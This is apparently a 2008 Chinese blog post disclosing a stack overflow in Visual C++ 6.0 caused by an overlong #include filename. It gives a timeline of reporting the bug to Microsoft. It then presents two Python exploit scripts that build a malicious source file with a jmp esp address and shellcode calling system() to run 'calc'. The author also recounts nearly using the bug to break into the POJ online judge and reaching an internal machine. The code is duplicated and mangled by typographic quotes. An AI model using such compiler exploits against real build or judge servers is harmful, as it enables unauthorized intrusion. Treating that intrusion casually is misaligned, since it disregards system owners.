vc6.0栈溢出
憋了半年了。
问题处在include的文件名长度未检测。
比如
#include “AAAA….AA”(超多A)
就会挂。
<=2008-2-17 发现漏洞。
2008-3-3 报告给MS,当天收到答复,说正在研究中。
2008-3-4 MS确认这是一个安全缺陷,但说Visual C++ 6.0的产品支持生命周期已经于2005年9月30日结束,因此不会为这个漏
洞发布安全公告或安全建议,且建议我不要公开。
我差点利用这个漏洞黑了poj(acm.pku.edu.cn,做acm的同学应该都知道这个网站)。
可惜功亏一篑,只得到了一台没有价值的内网机器,最后和管理员摊牌了。
既
vc6_exp.py
######################################################################
vc6_exp.py代码
- #!/usr/bin/env python
- # vc6 exploit by cly
- # 2008-2-17
- import struct
- address_jmp_esp = 0×1065AEB3
- address_system = 0×77BF93C7
- address_exit = 0×77C09E7E
- filename = ‘e.c’
- cmd = ‘calc’
- f = open(filename, ‘wb’)
- f.write(’#include “c:\\A’ + cmd + ‘||’ + ‘A’ * (146 - len(cmd))
- + struct.pack(’<i’, address_jmp_esp)
- + ‘\x83\xEC\x33\x83\xEC\x65\x8B\xC4\x83\xEC
- \x04\x89\x04\x24\xE8′
- + struct.pack(’<i’, address_system - 0×0012F0AF) + ‘\xE8′
- + struct.pack(’<i’, address_exit - 0×0012F0B4) + ‘A’ * 84 +
- ‘”‘)
- f.close()
Python代码
- #!/usr/bin/env python
- # vc6 exploit by cly
- # 2008-2-17
- import struct
- address_jmp_esp = 0×1065AEB3
- address_system = 0×77BF93C7
- address_exit = 0×77C09E7E
- filename = ‘e.c’
- cmd = ‘calc’
- f = open(filename, ‘wb’)
- f.write(’#include “c:\\A’ + cmd + ‘||’ + ‘A’ * (146 - len(cmd))
- + struct.pack(’<i’, address_jmp_esp)
- + ‘\x83\xEC\x33\x83\xEC\x65\x8B\xC4\x83\xEC
- \x04\x89\x04\x24\xE8′
- + struct.pack(’<i’, address_system - 0×0012F0AF) + ‘\xE8′
- + struct.pack(’<i’, address_exit - 0×0012F0B4) + ‘A’ * 84 +
- ‘”‘)
- f.close()
######################################################################
vc6_exp2.py
######################################################################
vc6_exp2.py代码
- #!/usr/bin/env python
- # vc6 exploit by cly
- # 2008-2-17
- import struct
- filename = ‘e.c’
- cmd = ‘calc’
- address_data = 0×1066EFFB
- shellcode = ‘\x32\xC0′ # xor al, al
- shellcode += ‘\xA2\x9E\xF0\x66\x10′ # mov [1066F09E], al
- shellcode += ‘\xA2\xA5\xF0\x66\x10′ # mov [1066F0A5], al
- shellcode += ‘\x68\x94\xf0\x66\x10′ # push 1066F094 ; ASCII
- “msvcrt.dll”
- shellcode += ‘\xFF\x15\xD8\x31\x65\x10′ # call [106531D8] ;
- kernel32.GetModuleHandleA
- shellcode += ‘\x68\x9F\xF0\x66\x10′ # push 1066F09F ; ASCII
- “system”
- shellcode += ‘\x50′ # push eax
- shellcode += ‘\xFF\x15\xDC\x31\x65\x10′ # call [106531DC] ;
- kernel32.GetProcAddress
- shellcode += ‘\x68\xA6\xF0\x66\x10′ # push 1066F0A6 ; ASCII
- cmd
- shellcode += ‘\xFF\xD0′ # call eax
- shellcode += ‘\x32\xC0′ # xor al, al
- shellcode += ‘\x50′ # push eax
- shellcode += ‘\xFF\x15\xB8\x31\x65\x10′ # call [106531B8] ;
- kernel32.ExitProcess
- f = open(filename, ‘wb’)
- f.write(’#include “c:\\’ + shellcode + ‘A’ * (149 - len(shellcode))
- + struct.pack(’<i’, address_data) + ‘msvcrt.dllAsystemA’
- + cmd + ‘ ‘ * (90 - len(cmd)) + ‘”‘)
- f.close()
##########################################################